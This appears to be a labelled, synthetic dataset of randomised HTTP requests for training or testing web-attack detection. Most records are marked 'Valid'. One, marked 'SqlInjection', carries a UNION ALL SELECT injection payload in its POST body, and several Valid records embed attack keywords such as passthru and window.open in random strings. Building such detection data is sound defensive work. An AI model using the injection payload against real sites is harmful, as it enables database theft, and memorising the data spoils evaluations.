Cookie: cvbtimgrqtrve=62021;loVssGiu=05663822;3dfdede=a@pLXZ_-;eseojedevIm=1
Cookie2: $Version="799"
Date: Sat, 11 Jul 09 20:18:15 UTC
ETag: "8BT5Ni58jyRMhwIlGa"
Expect: ugelm
From: bhodzdea@setynert.net
If-Modified-Since: Sat, 17 Oct 09 21:07:54 CET
If-Unmodified-Since: Sat, 18 Jul 09 19:32:53 UTC
If-Match: "I4lNaV0aVyOHp-JY"
If-None-Match: "l1uGzaB9eWylYGKG.t6"
If-Range: *
Max-Forwards: 31
MIME-Version: 6.5
Pragma: 2d9h='gh3cdyee'
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="nnstta"
Range: 4-20674
Referer: http://wnrb.net/j4ptdi.doc
TE: gzip;q=0.4,gzip;q=0.5
Trailer: Host
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 5.0; oa-au; rv:3.1.7) Gecko/60379483
UA-CPU: StrongARM
UA-Disp: 201,6990,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 5116x2106
Via: 0.3 www.ctrenlrh.css:4, 0.4 123.232.222.40, HTTP/2.3 52.238.68.151
Transfer-Encoding: deflate
Upgrade: Wlr/6.5, mnotTs/5.2, da54o/9.9
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 65.146.203.44
X-Serial-Number: 58227731
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17828
Start - Id: 14284
class: Valid
GET /itanii8lhsf/bovo/e470etfGDCVzpuO@koo/iLg/hOj9Xo7wx/BXJ0yC/hzt1imr2/vsuo7Eausanauqanea/rsextjefeDiamejsnn9n/oldjAiL.nsf?eottlsr=Jnsoh HTTP/1.0
Host: www.dhbxhhsi.fr
Connection: pjogh
Accept: */*;q=0.5
Accept-Charset: x-mac-korean, big5, euc-kr, windows-874, hz-gb-2312;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 12.204.42.238
Cookie: mDnd=dZyZ5C;xlwyt0e37Nwir=i;anakoTlmboitgid=hcafoex6o;gm=ttMoiecbssesdt3r;St5J-K=EiwaiDra3h4execoedfps;gwasaaipo=9630
Cookie2: $Version="20"
Date: Wed, 07 Oct 09 08:06:22 GMT
ETag: W/"wOc3bGCIQiTThHnC9bx"
Expect: ya6mphne=miwliiHh
From: 5Urtoesa@acesm4hrat.de
If-Modified-Since: Thu, 21 Sep 06 18:07:32 UTC
If-Unmodified-Since: Tue, 16 May 06 08:53:01 CET
If-Match: *
If-None-Match: "MKDNu_kZ@9vjFmTXo"
If-Range: *
Max-Forwards: 37
MIME-Version: 8.7
Pragma: rnUuhS=caG
Proxy-Authorization: Basic TWVTbXN4ZW06c3J5ZW1F
Authorization: alnmtr Hspeh=iwxrtaip
Range: 118-,169-11
Referer: /ron4441l/t7ho.jpeg
TE: trailers,gzip;q=0.5,chunked
Trailer: Transfer-Encoding
User-Agent: neatcbaoAF (e42h17I; opPcz@hvc)
UA-CPU: MIPS
UA-Disp: 6371,9716,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2883x951
Via: 7.2 www.ases7.shtml, FTP/4.6 157.70.216.155:501, HTTP/6.1 203.122.5.6
Transfer-Encoding: aaaemm
Upgrade: tut/3.1, tnmcy/2.5, 9Pn5n/5.5, wtte/0.4, sWn/2.2
Warning: 266 www.herseaeN.jpeg "tmrynotpilhesnurx1o" "Tue, 06 Sep 05 18:17:57 UTC"
X-Forwarded-For: 235.126.58.179
X-Serial-Number: 0081275585581186032
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14284
Start - Id: 9342
class: Valid
GET /SVpjUyOHetcXC7/nuLzEokrSeah0beI/noped3gsiiozFzlse/rsdkl/2c5t7uRE2passthru6U/asyewFrtjidseuimofkf/t-a/amqwC98oPOG.php? HTTP/1.1
Host: 29.220.163.122
Connection: steanbto
Accept: audio/*;q=0.9, audio/basic, audio/*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: compress, identity, identity, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 216.113.175.44
Cookie: eOsosneos=ash1AleI6utl;lhnndils3fc=autoexec(l2 ;dywhs5u4g9Ojsc=141279;egtuIof=t~n;ahndytrne=og3msZcf
Cookie2: $Version="05"
Date: Sun, 25 Nov 07 17:39:03 GMT
ETag: "EoKCZVJzOT0CrUv9L"
Expect: 100-continue
From: hwtSu76@kdazi.net
If-Modified-Since: Fri, 27 Aug 04 23:54:11 GMT
If-Unmodified-Since: Fri, 13 Jun 08 10:19:14 CET
If-Match: "E0tK_nXZYyruOLu6"
If-None-Match: *
If-Range: *
Max-Forwards: 34
MIME-Version: 3.5
Pragma: eseXs='pams'
Proxy-Authorization: ud0w tNdb=terh
Authorization: iesOf ie4s2=zr6co5
Range: -41,91189-8,552-
Referer: /lyrtT.nsf
TE: gzip;q=0.1
Trailer: Accept-Charset
User-Agent: cOVWCVibDv http://www.tSxRrt.net
UA-CPU: 68000
UA-Disp: 366,9713,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4908x484
Via: HTTP/6.0 71.124.79.148:0486, HTTP/8.8 249.170.184.12
Transfer-Encoding: compress
Upgrade: fig/5.8, tNrm/6.1, astn/5.2, txry/4.5
Warning: 709 17.102.2.9 "acKn" 
X-Forwarded-For: 135.104.235.17
X-Serial-Number: 942540153397
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9342
Start - Id: 41505
class: SqlInjection
POST /isIrt9hhs1o0meehe/Aitker1durlse/ih_16O2sNk5./hsaaanEgYltlMRduh/89LinputbQcHddtUiA/feVMsfEPtMzGD/sisehsm3MadrklnhhaEx/fKY9.tiff? HTTP/1.0
Content-Length: 396
Content-Language: 4uminsh1,Sma
Content-Encoding: compress
Content-Location: /dodlstfn/ahoDgju/leNoshd/cnnnsedy.mpeg
Content-MD5: OEhpdG1lZGluYkFlbWRpaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Jul 08 08:48:00 GMT
Last-Modified: Thu, 09 Jul 09 05:52:17 GMT
Host: 38.108.246.149
Connection: close
Accept: image/*, video/*;q=0.2
Accept-Charset: windows-1254, ks_c_5601-1987;q=0.0, x-mac-korean;q=0.0, shift_jis
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 3.29.1.103
Cookie: laa4Adonaio=00;yaRhtr=s4btT;lYd4O=osaccess_log6;eat=eqO'wallt;cRuuep5de=Ol;st4ltdt=adw : a-uemaile
Cookie2: $Version="299"
Date: Sun, 15 Jun 08 11:53:13 UTC
ETag: W/"Ohan5E8Ng@JLl6b"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Wed, 28 Nov 07 14:09:53 CET
If-Unmodified-Since: Sun, 07 Mar 04 04:55:01 UTC
If-Match: "jS_@PhBQ.eTxcRurXC"
If-None-Match: "zBaWVeRsJOGOdfic3"
If-Range: *
Max-Forwards: 431
MIME-Version: 9.8
Pragma: tRtc9iaa='enssm'
Proxy-Authorization: NTLM ZWx3bnJjY25jVGVvbzkzZHRuMWFhbGFydzVhcmVuaHl6YnF2Yw==
Authorization: NTLM NUFFU3NsaXh5cWFuZW5wbmU5YWpMRWVTb3V3dHRlZWNsNmRhc2Jybg==
Range: 229-94,-0,-455
Referer: /njemw.tar.gz
TE: gzip;q=0.6,trailers
Trailer: Via
User-Agent: aworu (qneS3v; sd96gql; 93spqOcVB; oSZBcaFrGo)
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: 0.8 www.uuteUZl.shtml, e3epcc/9.0 9.187.170.229
Transfer-Encoding: deflate
Upgrade: qesoym/6.9, itea/7.1, ren/6.1, Ewserd/7.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0aeeH5=315605&szigomh5k=osrs7ZmoL_&yynaat3f=zrtbohXwY9orstez&tu=uV6YlPuBCZ&rktistPdpe=18474666&s5ieein5nhssr=se5strsrnbhLOi3Ui&iai=779&Myhdrowh8lifc5=dnirakeratehahy&eiteS77Sp=355&aimtnoheijsser=dcmssrxll$t0dh itmpet&dtdtvnsTyoioad=emnshc'   UNION ALL    SELECT    l10oet   FROM   us7wtmdt6m     WHERE  ''   = '&lhleaIs=lrn@o&sts42spb=tattnScdar=l[Fc\ c&bE3l0ene=1413701&2eh=h

End - Id: 41505
Start - Id: 24898
class: Valid
GET /n-@l3iKR0udKzbC8/r@KtHHwi9io7-oILz/ord9/HWd0eiwyo1se/sjHdBG7L9.msf?h4K8XkUvrY=eGLy&oguvltlefzeii=5515935&6VYOsw=uTM7GO31SF&gwuajoae=es%40&ipectpeeit=9&nh=720&n9mhma6eo6nb=pei&he=wtoV&caOvuy9ios7L=+asxmls&tieNttf=5211542 HTTP/1.0
Host: 13.143.184.56
Connection: demt9
Accept: text/*;q=0.2, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: obsOSvw-ei, tHItlite-bwhar, s-rgMsea0
Cache-Control: no-store
Client-ip: 182.12.175.61
Cookie: 6hayumTh=aBa;HGsng4iwthae=sfbt$5u;1yktoaoadmeayo= nullseeNlinki]mdropcp=nqderm
Cookie2: $Version="224"
Date: Mon, 08 Sep 08 10:11:49 GMT
ETag: W/"FxtqU09exwYLETXGjByR"
Expect: 100-continue
From: hlfll@11tset.net
If-Modified-Since: Tue, 14 Dec 04 19:49:20 CET
If-Unmodified-Since: Sat, 11 Nov 06 07:16:48 GMT
If-Match: *
If-None-Match: *
If-Range: "CS0zHx@ZWMabfBgA"
Max-Forwards: 7
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="nodeiar"
Authorization: Basic aGV0Z3BhaWI6bmV0YXF0
Range: -19,-61236
Referer: /nhbqt/ne3epea.dll
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 1.3; do-s0; rv:3.2.8) Gecko/91489199
UA-CPU: MIPS
UA-Disp: 8792,070,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 103x0441
Via: 4.5 www.gpthllb.jpeg:6685
Transfer-Encoding: identity
Upgrade: 7ba/7.9, eEidk/9.1, nEhd/9.1
Warning: 430 178.33.189.66 "taE90anszeAies" "Thu, 03 Feb 05 22:56:19 CET"
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 5477334
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24898
Start - Id: 15366
class: Valid
GET /tRB6yAWEm/lbqmIBnph-MTLDoA/ea0jLrpoodtSue/3rtmegihopa4naNtn/0t3olwuom8jucSq2nd/d1jR.Rd6u@WSrLa/nVrG/vkF5/QO/nmrw8Etplbczsyuau.shtml?Atnnataabz=5iwshutdownstyle&tmuhshpx=0392350&I3vjpQv8=8784&tsh=deicu9dzismt&dr=iRLEMwY&Eimr5reann=5Du&eoo2edn=aas&s6hewbEr9niyi=aeseundo6srhad&osyou=4&stdpae6R7Aroai=window.open+-ho&ctns21d0stt=86&cMifbA9atp=olyA.c&rSbelv=ece&XDsAaooiHuCanta=315&eiOlhtndLrgwtia=8%3Beeca HTTP/1.1
Host: 61.211.77.34
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: taO-i;q=0.1, teezqlz-iouhltd, bho4n3a-amrS1;q=0.4, rskaaS-jreoyeyb;q=0.8
Cache-Control: no-store
Client-ip: 1.126.250.57
Cookie: srt6E9dtneAd=7623326
Cookie2: $Version="58"
Date: Sun, 06 Mar 05 03:01:58 CET
ETag: W/"rpsSZWkJNUkV0RD9"
Expect: usuEsy=ohuAo3uo;niine
From: geinl@l3cifnrd43.fr
If-Modified-Since: Mon, 29 Oct 07 14:26:09 GMT
If-Unmodified-Since: Sat, 07 Jun 08 01:36:31 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 7.7
Pragma: nell='secNIrhd'
Proxy-Authorization: Basic bmVpc25hZGU6MHRzZ3Nv
Authorization: NTLM ZUlUaTdpZXJhc2xyYWNtaWUyZW9tZEl1dXdFYnVzbW1ycDh1YWF3bnk=
Range: 75-,670-452322
Referer: /ilai/eactocr/iliaKe.pl
TE: chunked;q=0.3,trailers
Trailer: TE
User-Agent: Mozilla/9.2 (compatible; MSIE 2.0; Open BSD i586; meedbio)
UA-CPU: StrongARM
UA-Disp: 4712,7583,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 065x683
Via: 8.4 254.68.207.193:932
Transfer-Encoding: compress
Upgrade: taal/5.1, qooc/0.7
Warning: 110 199.172.130.251 "3ahnwUsse4t" "Tue, 14 Jun 05 17:49:50 GMT"
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 15366
Start - Id: 33867
class: Valid
PUT /r_9stdinWS/i7MiZCunloL_B..d-c8F.jpeg? HTTP/1.1
Content-Length: 61
Content-Language: asvrbnCo,e
Content-Encoding: compress
Content-Location: http://www.fydfmm.net/e9suann/6toqeIst/Edeye/isnTaWb.cfm
Content-MD5: bzJXYW9ydWVlc2E0bnN0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jan 04 02:11:26 CET
Last-Modified: Sun, 23 Nov 08 21:40:02 CET
Host: www.thlju.de
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp;q=0.9, koi8, shift_jis;q=0.8, iso-8859-5;q=0.5, iso-10646-ucs-2;q=0.9
Accept-Encoding: identity, gzip, deflate;q=0.9
Accept-Language: hTe4wyag-a;q=0.7, ax-nvlar, fsnire-iFdrebsn, nsstmrua-n
Cache-Control: max-age=0
Client-ip: 148.121.124.137
Cookie: Eai04ep=5;0ueEEwstos4Uzr= oia)teopen
Cookie2: $Version="463"
Date: Sun, 22 Mar 09 24:45:07 UTC
ETag: "fQ-1cn8ZVzi.yxkm"
Expect: i1rrml=0enagl;rthdoaWb
From: aweKeho@stzd.uk
If-Modified-Since: Wed, 18 Aug 04 23:24:01 CET
If-Unmodified-Since: Fri, 13 Feb 04 23:30:58 CET
If-Match: *
If-None-Match: "IoEN98ZJbaFZfaHm"
If-Range: "nT3zi7NXYhk6nC57"
Max-Forwards: 1745
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM ZXJvbGV6dHQ2aWhyaHR0bGUzZTVzZ2RpYmFzNXJpb2VodG5uMk8=
Authorization: NTLM cmtobGVFZXRmdDN5RWVlb2xPbmVqVWMxc3JlNWxyNTN2YTdlYXNuZWU1dGFo
Range: 087-,7302-92442,-157
Referer: http://www.sCstwanA.st/y1rtfs/nhiae/sdx7s.txt
TE: gzip,deflate;q=0.0
Trailer: Transfer-Encoding
User-Agent: uaqt (eaPUQyN; iwjbLB; rCMlpdDqe)
UA-CPU: 68000
UA-Disp: 260,747,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1982x002
Via: 1.3 20.66.165.144
Transfer-Encoding: gzip
Upgrade: 1heem/5.4, eot/5.0, kci2K/9.9, nTh/3.0
Warning: 645 183.170.1.82 "e3idEdht9taeftk" 
X-Forwarded-For: 36.38.198.62
X-Serial-Number: 562812126143349
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

lYVd1L2eincludenK=56&EbvGT=9078475&edftegaG6Ow2er1=9769748860

End - Id: 33867
Start - Id: 9897
class: Valid
GET /om73gnrgeh6enEbnlt/mr/TatwtctmnrLhnhaq/ofi85e/nnrcpoSnte/40ZmMaIKh7p@mMwQFuP/rcldEhyidttt3iei/mn/dj-delete@v0CTrform/eBEKCQzY7VLbgU.gif?qynni7wth=15&Pacummhr9D=+ebperlduipa&hnltpnEqme=hhrr4ajcedde3er&mbalssi=arRE5e&eeeuinaEdu=+dna%3Fservices8yegSn&Dad5o0=hZuctwindow.openmulouo&9aiSslbda=uurameta HTTP/1.0
Host: 110.19.159.186
Connection: keep-alive
Accept: image/gif;q=0.5, application/*
Accept-Charset: iso-8859-4;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: n=R
Client-ip: 79.46.22.252
Cookie: y3sMaworn0n=zruxN2yrSMh
Cookie2: $Version="3"
Date: Sat, 19 Jan 08 11:24:09 CET
ETag: "W1YghaQsoItNO1M"
Expect: xiy0
From: reieurea@btrTy7r.com
If-Modified-Since: Mon, 18 Jan 10 13:24:45 UTC
If-Unmodified-Since: Tue, 17 Nov 09 10:54:08 CET
If-Match: "9W3pOKD-c2OUdNxmMT"
If-None-Match: "YiXc@jWGVi-oLJgb_ZUW"
If-Range: Sun, 14 Jan 07 03:40:39 UTC
Max-Forwards: 60
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM ZXJobjZsd3NMcnN0RWlwcG5pYWRob21lb3NubXh0b28ybnM=
Range: -93110,-40747,-37
Referer: http://lywqdvas.net/nrmchayy.mpeg
TE: gzip,trailers
Trailer: Referer
User-Agent: Mozilla/8.1 (compatible; 3ieetmslu; Solaris; aiyae; hh5eeatt; mpbiteso)
UA-CPU: StrongARM
UA-Disp: 042,750,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 561x200
Via: FTP/7.6 www.ztdE.jpg, 6.8 129.152.215.11
Transfer-Encoding: compress
Upgrade: lshhnT/1.9, eeb/3.9, Ia5/6.6, ttme/7.7
Warning: 400 www.satoatm.gif "qstaeInaenai" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 9554441251585
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9897
Start - Id: 14121
class: Valid
GET /aPlrSkmC/pMi3_HXHVm80IU/acLP8.tiff?otote2keauawtSo=z%26+8e&UDXBcD_0do=aewnulleet%3Feeaeepgmaa&soqjitnp5=irwtiefnvncca&oe5ueadA=6mgnrontiajhod+o8&sipna=3o HTTP/1.1
Host: 110.242.94.108
Connection: eh7c6ntd
Accept: video/mpeg;q=0.7, audio/x-wav;q=0.9, audio/*;q=0.8
Accept-Charset: iso-2022-jp, koi8-r, x-mac-ce;q=0.0, utf-7;q=0.3, x-mac-hebrew;q=0.9
Accept-Encoding: 
Accept-Language: ecrcdaO-ns8oal;q=0.9
Cache-Control: no-store
Client-ip: 228.74.5.236
Cookie: gA7I0axtermbetweenMJ=n;vhtsesiklc=645226;nr1kodppiew=ieetywIsehs;oenoZ=ewmhf
Cookie2: $Version="97"
Date: Sun, 02 Nov 08 06:14:08 GMT
ETag: W/"nJgMeJDrVTV9RLc"
Expect: ewBta
From: zess@lSzAtt.de
If-Modified-Since: Thu, 11 Aug 05 24:40:54 GMT
If-Unmodified-Since: Thu, 13 Jan 05 15:11:58 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9771
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: OcS4cT tuh8dxe=wudn
Authorization: Digest qop=auth
Range: -445,968337-8
Referer: /mrttscnm/meAe/hmhm0/isfnh1/ykvsiS.avi
TE: gzip;q=0.2,gzip,gzip
Trailer: Trailer
User-Agent: 6iUtlep1asedriear
UA-CPU: x86
UA-Disp: 8924,5533,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 054x638
Via: FTP/8.9 www.5seud.htm:683
Transfer-Encoding: deflate
Upgrade: es2/8.7, ie2h/4.4, rTwnk/3.6, igas/0.9
Warning: 021 63.233.31.79 "yeinsrEe0N9" 
X-Forwarded-For: 192.192.53.173
X-Serial-Number: 76880037963777825874
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14121
Start - Id: 24035
class: Valid
GET /kljGUS/ewviaLeac5jtEt0W/5HupdatebZF7.js?hseexcnstatheh=eUS4spt5DwP&rmrAnclrndia=%3Er3%3B&mw8etredomonr=kWHxiG&nqpo=1060&neiiiO=7kz&jjhihsUsnh=msxSav&yancd=wcusi&s0Hoi=s+c&mraHfocrts=uidivts%2Blheic&nhtre=onne1&steefaarrsauno=w+o&7eeo8=+f-enDow HTTP/1.0
Host: 193.235.217.98:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-8-i
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 222.183.40.181
Cookie: opto=admin8lg 7oe'ncg
Cookie2: $Version="34"
Date: Mon, 22 Mar 04 10:22:51 UTC
ETag: "s7ixD4fsb@27TuT"
Expect: era0lhbh
From: natnb@meToaai.org
If-Modified-Since: Tue, 16 Mar 10 16:43:56 GMT
If-Unmodified-Since: Thu, 16 Feb 06 24:15:47 CET
If-Match: *
If-None-Match: "vYrwPxf8IqJ-bgo"
If-Range: "uzxGPqGG4cAUyddT"
Max-Forwards: 4
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: 5pue neoh0ai=ade4maHi
Authorization: Digest cnonce="rHfkrpo"
Range: 3-,-932
Referer: http://55upst.cz/srsa6e/9xkcony7/zscAo9et.txt
TE: trailers
Trailer: Date
User-Agent: iXA_qXO http://www.sEMiee.ch
UA-CPU: StrongARM
UA-Disp: 6759,036,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 314x0873
Via: HTTP/9.2 152.218.203.44, FTP/8.4 www.dsdTi.jpg:866
Transfer-Encoding: gzip
Upgrade: h3rE/8.7, eogee/2.9, td0aa/8.5, toirs/3.2, Lme/4.0
Warning: 560 www.e6Dyu8.png "snbntciioi9G" "Wed, 08 Apr 09 10:48:35 GMT"
X-Forwarded-For: 60.32.75.53
X-Serial-Number: 908783309035145114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24035
Start - Id: 24983
class: Valid
GET /2SQ-dLDzS9HIrKBHoLjg/Fag7eMmechoa0Ltelnet3w/anmZ/on.Fchild9vP/e7o/uox/Y0s1V7Qs0Iimg/ny_lK0bo..8JPko7LF/inEsa6s3/ny.htm?ehayh=hls&vowsoeejqjnv=b&htOfscengdr4=u&ut7g=85&fnroeia=tegmtontBn HTTP/1.1
Host: 39.86.102.248:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.9, identity;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 178.60.165.47
Cookie: nHaicittcnyoi=+5mneansRrebetween\|
Cookie2: $Version="4"
Date: Sat, 10 Apr 10 21:59:53 UTC
ETag: W/"CvQ_dK.kzcRNGW9HuX"
Expect: 100-continue
From: fuMo9@nrmr.net
If-Modified-Since: Wed, 19 Nov 08 18:32:57 UTC
If-Unmodified-Since: Wed, 28 Mar 07 21:45:57 UTC
If-Match: "WEyfIvPxdkjQFTJb1g1A"
If-None-Match: *
If-Range: Thu, 30 Jun 05 03:12:52 GMT
Max-Forwards: 21
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dd5egaCs"
Authorization: NTLM dG9tMHNua2llYWhKZW9JaXNuZXBZQ2Vvc250dWVybTVvbnM=
Range: -67,790189-2941
Referer: /0em6oDno/uimi/UzetaetS.php
TE: trailers
Trailer: If-Match
User-Agent: oaRrEdoneurdh4y6
UA-CPU: StrongARM
UA-Disp: 7088,5005,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 669x906
Via: HTTP/9.1 189.203.77.236, 3.3 206.66.31.215, tsrs/6.2 142.159.179.12:04
Transfer-Encoding: identity
Upgrade: Rlbeo/8.4, roo/0.4, neokz/4.8, r6t7/6.6, AtzUe/8.5
Warning: 347 www.tmelbn.css "xpmnskfisBst7H1dolo" "Sun, 29 May 05 13:30:10 CET"
X-Forwarded-For: 212.148.33.104
X-Serial-Number: 4634746
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24983
Start - Id: 18498
class: Valid
GET /hia6hsttugtbts/zG/7@lbCDvoBmnIdYYR/p2wgynal48jSliow/E82raoisko4ehtnroo/t-0/SKqB0f6YL/yakAvl-EQy/arlaSshoemneigt/2HaCULoI.f9Lvf/l5u4ezY3f6Do9cdua7s6.gif?_4qRF=htm&ev=txz5iuvvj. HTTP/1.0
Host: 250.84.83.44
Connection: l6Shrn
Accept: text/*, audio/*;q=0.8
Accept-Charset: koi8;q=0.1, windows-874;q=0.0, windows-1250, iso-10646-ucs-2;q=0.5, x-mac-korean;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=585
Client-ip: 117.52.42.62
Cookie: LVkEXltZrh=icEn;ectdztos=xP@fNo-S9l59
Cookie2: $Version="2"
Date: Sun, 06 Sep 09 09:13:19 GMT
ETag: W/"ZPYVnFfO-qRYtP4sw"
Expect: 100-continue
From: eocete@3mtoie.org
If-Modified-Since: Tue, 11 Jan 05 10:56:13 CET
If-Unmodified-Since: Thu, 06 Mar 08 15:49:51 GMT
If-Match: "6h2fzQolgIA-aa8"
If-None-Match: "lD92KjCCYFpTEdwY22"
If-Range: Tue, 31 May 05 10:43:51 GMT
Max-Forwards: 1
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="3jshnz"
Authorization: NTLM aHcxaW1lbmRkaXNvbmVBaGVob2lwYWNjcDZ1N3NpYXJ0cjFwdWtuaWRi
Range: 22554-
Referer: /eeyoe/TeDahn/cAadhTze/tBdIw1pn/nsxr.swf
TE: trailers,gzip
Trailer: If-Range
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 6.5; mr-nH; rv:3.7.1) Gecko/05287777
UA-CPU: PowerPC
UA-Disp: 1147,7434,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 934x751
Via: FTP/1.1 236.193.132.53
Transfer-Encoding: compress
Upgrade: ryat/0.4, gavm/5.1, n8hana/0.1
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 100961283776
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18498
Start - Id: 27327
class: Valid
GET /jSEZ51uX_pLh91_/zXQz4@bwt6/WZQlMawxh/nyW@h/i-SCaMLgL.html? HTTP/1.1
Host: 180.231.26.151:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.8
Cache-Control: max-stale=13
Client-ip: 47.126.124.55
Cookie: Enorcasthxqa=ltsbbinR;8kRkA=1333000
Cookie2: $Version="7"
Date: Fri, 29 Aug 08 10:40:10 GMT
ETag: "XQxOMnH1niKguaET"
Expect: 100-continue
From: vwlot@te9enkmla.fr
If-Modified-Since: Sat, 03 Sep 05 14:36:32 CET
If-Unmodified-Since: Sat, 12 Sep 09 04:21:59 CET
If-Match: "6oLNb5vQc882yZUB"
If-None-Match: "l-qDq5SkbrE0qSfz4_d"
If-Range: "I5-MGzRqkH86ZCz"
Max-Forwards: 7
MIME-Version: 2.2
Pragma: dPiua0=oocTdF
Proxy-Authorization: NTLM ckVlaDJuRU5hZWhqb3RkMWVrdW5uZTlvc2h1cHRyYW9k
Authorization: Basic cHhoODp2Z3Rp
Range: -49505
Referer: http://cyree0ns.fr/fmi1oVa.pl
TE: gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.8 (compatible; Konqueror/0.0; WinNT; oreribman; lrcwd; yldroM4)
UA-CPU: PowerPC
UA-Disp: 3109,349,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3599x969
Via: HTTP/1.9 www.See1.gif, 0.1 146.189.115.200, boaheV/8.7 141.254.93.232
Transfer-Encoding: gzip
Upgrade: fejcgv/4.5, ham/0.8, 7tms/5.4, dpns/2.3, hnoh/0.3
Warning: 310 www.wIblei.png "anibiOgti2Un" "Sun, 21 Feb 10 08:44:37 CET"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 99615814182881268
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27327
Start - Id: 6015
class: Valid
PUT /euu8X/pagoeiceuwBeexxuoym/eYDtF-TuB/enmOBs2e6-u/eaDtt2itt.php4? HTTP/1.0
Content-Length: 68
Content-Language: ibe
Content-Encoding: compress
Content-Location: http://www.ihlaoze.biz/oynSti/Aqaekok/ol7wtrg/Tlalmpt.cgi
Content-MD5: ZndUYWFEZWVpZWU3bGllVA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Sep 09 09:22:26 UTC
Last-Modified: Sat, 14 Jul 07 09:37:36 GMT
Host: 224.120.237.38
Connection: e3sagstw
Accept: */*;q=0.7
Accept-Charset: x-mac-korean, x-mac-arabic, x-mac-icelandic;q=0.3, cp-950;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 245.151.90.40
Cookie: tioanpit=eksam
Cookie2: $Version="65"
Date: Mon, 01 Dec 08 08:38:09 UTC
ETag: "44WoR0Df3YVEk80G@"
Expect: hrbn=ueeahm;fhtuc3e=sTal
From: rcbvu@C5cieoj.de
If-Modified-Since: Mon, 07 Sep 09 12:54:38 CET
If-Unmodified-Since: Fri, 05 Feb 10 05:38:10 UTC
